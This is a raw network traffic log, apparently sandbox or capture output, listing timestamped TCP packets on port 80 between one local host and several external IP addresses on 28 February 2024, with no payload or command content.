Feb 28, 2024 15:47:27.322599888 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.378381968 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.637106895 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.637190104 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.637248993 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.637306929 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.637360096 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.637419939 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.637491941 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.637563944 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:27.637656927 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.637721062 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.637775898 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.638235092 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.952188015 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.952270985 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.952312946 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.952672958 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.953202963 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.953263998 CET	80	50266	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:27.953476906 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:28.518805027 CET	50266	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:29.534720898 CET	50267	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:29.844651937 CET	80	50267	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:29.844963074 CET	50267	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:29.845065117 CET	50267	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:30.154733896 CET	80	50267	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:30.443458080 CET	80	50267	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:30.443523884 CET	80	50267	109.234.166.81	192.168.11.20
Feb 28, 2024 15:47:30.443885088 CET	50267	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:30.443941116 CET	50267	80	192.168.11.20	109.234.166.81
Feb 28, 2024 15:47:30.753588915 CET	80	50267	109.234.166.81	192.168.11.20
Feb 28, 2024 15:48:00.106250048 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:00.425646067 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:00.933494091 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:01.252835989 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:01.761462927 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:02.080931902 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:02.589473963 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:02.908826113 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:03.417582035 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:03.736805916 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:04.745927095 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:05.065332890 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:05.573224068 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:05.900911093 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:06.401257038 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:06.728883982 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:07.229110956 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:07.556814909 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:08.072602034 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:08.400193930 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:09.416637897 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:09.736058950 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:10.244134903 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:10.563391924 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:11.071952105 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:11.391316891 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:11.900043964 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:12.219464064 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:12.727948904 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:13.047393084 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:14.056597948 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:14.376064062 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:14.883630037 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:15.202965021 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:15.711680889 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:16.031172037 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:16.539649963 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:16.858947039 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:17.367537975 CET	50268	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:17.686846018 CET	80	50268	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:17.693140030 CET	50269	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:18.035021067 CET	80	50269	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:18.539278984 CET	50269	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:18.852123976 CET	80	50269	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:19.367153883 CET	50269	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:19.702315092 CET	80	50269	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:20.210742950 CET	50269	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:20.537847042 CET	80	50269	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:21.038659096 CET	50269	80	192.168.11.20	156.232.32.175
Feb 28, 2024 15:48:21.379184961 CET	80	50269	156.232.32.175	192.168.11.20
Feb 28, 2024 15:48:25.710201025 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:48:26.724814892 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:48:28.740084887 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:48:32.754740000 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:48:40.768693924 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:48:47.798867941 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:48:48.813855886 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:48:50.829077959 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:48:54.843681097 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:02.857758999 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:09.888500929 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:10.902801991 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:12.917931080 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:16.932686090 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:24.946650982 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:31.976934910 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:32.991795063 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:35.006910086 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:39.021706104 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:47.035572052 CET	50270	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:49:53.053087950 CET	50271	80	192.168.11.20	154.55.135.138
Feb 28, 2024 15:49:54.049536943 CET	50271	80	192.168.11.20	154.55.135.138
Feb 28, 2024 15:49:56.064825058 CET	50271	80	192.168.11.20	154.55.135.138
Feb 28, 2024 15:50:00.079533100 CET	50271	80	192.168.11.20	154.55.135.138
Feb 28, 2024 15:50:01.079696894 CET	50272	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:01.236227989 CET	80	50272	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:01.236457109 CET	50272	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:01.236638069 CET	50272	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:01.392973900 CET	80	50272	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:01.406229019 CET	80	50272	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:01.406318903 CET	80	50272	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:01.406595945 CET	50272	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:02.750967979 CET	50272	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:03.766575098 CET	50273	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:03.923145056 CET	80	50273	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:03.923516989 CET	50273	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:03.923707008 CET	50273	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:04.080055952 CET	80	50273	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:04.096843958 CET	80	50273	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:04.096935987 CET	80	50273	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:04.097176075 CET	50273	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:05.437838078 CET	50273	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.453727961 CET	50274	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.610366106 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.610586882 CET	50274	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.611884117 CET	50274	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.611938953 CET	50274	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.611989975 CET	50274	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.768436909 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.768502951 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.768543959 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.768640995 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.768645048 CET	50274	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.768691063 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.768728018 CET	50274	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.768735886 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.768776894 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.768815041 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.768866062 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.768907070 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.768955946 CET	50274	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.769187927 CET	50274	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.781537056 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.781646967 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.781872988 CET	50274	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:06.925261021 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.925323009 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.925368071 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.925406933 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.925642967 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.925699949 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.925751925 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.925792933 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.925832987 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.925872087 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.926136971 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.926228046 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.926295042 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.926336050 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.926373959 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.926410913 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.926446915 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.926485062 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.926522970 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:06.938293934 CET	80	50274	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:08.093421936 CET	50271	80	192.168.11.20	154.55.135.138
Feb 28, 2024 15:50:09.140383959 CET	50275	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:09.297149897 CET	80	50275	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:09.297540903 CET	50275	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:09.297665119 CET	50275	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:09.454246044 CET	80	50275	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:09.465389967 CET	80	50275	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:09.465461016 CET	80	50275	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:09.465796947 CET	50275	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:09.465854883 CET	50275	80	192.168.11.20	172.67.130.3
Feb 28, 2024 15:50:09.622379065 CET	80	50275	172.67.130.3	192.168.11.20
Feb 28, 2024 15:50:14.108164072 CET	50276	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:50:14.467546940 CET	50277	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:14.644320011 CET	80	50277	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:14.644517899 CET	50277	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:14.644783020 CET	50277	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:14.821476936 CET	80	50277	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:14.821794987 CET	80	50277	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:14.821857929 CET	80	50277	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:14.822036982 CET	50277	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:15.123352051 CET	50276	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:50:16.154283047 CET	50277	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:17.138484001 CET	50276	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:50:17.169918060 CET	50278	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:17.338295937 CET	80	50278	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:17.338532925 CET	50278	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:17.338767052 CET	50278	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:17.507034063 CET	80	50278	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:17.507116079 CET	80	50278	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:17.507793903 CET	80	50278	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:17.508019924 CET	50278	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:18.841265917 CET	50278	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:19.857004881 CET	50279	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:20.025582075 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.025820971 CET	50279	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:20.027205944 CET	50279	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:20.027297020 CET	50279	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:20.196254969 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.196341038 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.196386099 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.196432114 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.196470976 CET	50279	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:20.196557999 CET	50279	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:20.196557999 CET	50279	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:20.196597099 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.196654081 CET	50279	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:20.196660995 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.196855068 CET	50279	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:20.196855068 CET	50279	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:20.365489960 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.365554094 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.365777969 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.365957022 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.366003990 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:20.366647005 CET	80	50279	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:21.153285980 CET	50276	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:50:22.543812037 CET	50280	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:22.712322950 CET	80	50280	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:22.712492943 CET	50280	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:22.712673903 CET	50280	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:22.881032944 CET	80	50280	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:22.881776094 CET	80	50280	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:22.881855965 CET	80	50280	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:22.881907940 CET	80	50280	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:22.881958008 CET	80	50280	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:22.882281065 CET	50280	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:22.882345915 CET	50280	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:22.882395983 CET	50280	80	192.168.11.20	82.180.172.14
Feb 28, 2024 15:50:23.050879955 CET	80	50280	82.180.172.14	192.168.11.20
Feb 28, 2024 15:50:27.886543989 CET	50281	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:28.113158941 CET	80	50281	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:28.113524914 CET	50281	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:28.113737106 CET	50281	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:28.332550049 CET	80	50281	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:29.166996956 CET	50276	80	192.168.11.20	154.39.248.133
Feb 28, 2024 15:50:29.620063066 CET	50281	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:29.797306061 CET	80	50281	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:29.797372103 CET	80	50281	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:29.797511101 CET	50281	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:29.797512054 CET	50281	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:29.848429918 CET	80	50281	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:29.848579884 CET	50281	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:30.635858059 CET	50282	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:30.858828068 CET	80	50282	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:30.859102011 CET	50282	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:30.859256029 CET	50282	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:31.097316027 CET	80	50282	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:31.195075035 CET	80	50282	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:31.195147038 CET	80	50282	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:31.195504904 CET	50282	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:32.369601011 CET	50282	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:33.385304928 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:33.619146109 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.619477987 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:33.620800018 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:33.620896101 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:33.851511002 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.851574898 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.851617098 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.851855993 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.851914883 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.851948977 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:33.851955891 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.851998091 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.852148056 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:33.852212906 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.852256060 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.852294922 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:33.852327108 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:33.852400064 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:33.852643013 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:34.090446949 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.090511084 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.090553045 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.090703964 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:34.090802908 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.090861082 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.090878010 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:34.090910912 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.090953112 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.091125965 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.091170073 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.091190100 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:34.091293097 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.091335058 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.091510057 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.323414087 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.323472977 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.323513985 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.323755980 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.323812008 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.544177055 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.544260025 CET	80	50283	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:34.544523001 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:35.134588957 CET	50283	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.150182009 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.382246017 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.382616043 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.382797003 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.612626076 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.700812101 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.700891018 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.700947046 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.701006889 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.701061010 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.701113939 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.701149940 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.701167107 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.701220989 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.701273918 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.701314926 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.701335907 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.701483011 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.701483011 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.701652050 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.941021919 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941096067 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941157103 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941210985 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941263914 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941318035 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941370010 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941423893 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941476107 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941529036 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941570997 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.941570997 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.941570997 CET	50284	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:50:36.941581964 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941637039 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941690922 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941744089 CET	80	50284	198.54.117.242	192.168.11.20
Feb 28, 2024 15:50:36.941749096 CET	50284	80	192.168.11.20	198.54.117.242
